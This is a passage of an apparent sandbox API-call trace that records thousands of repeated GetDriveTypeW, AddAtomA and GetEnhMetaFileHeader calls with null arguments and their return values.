(lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 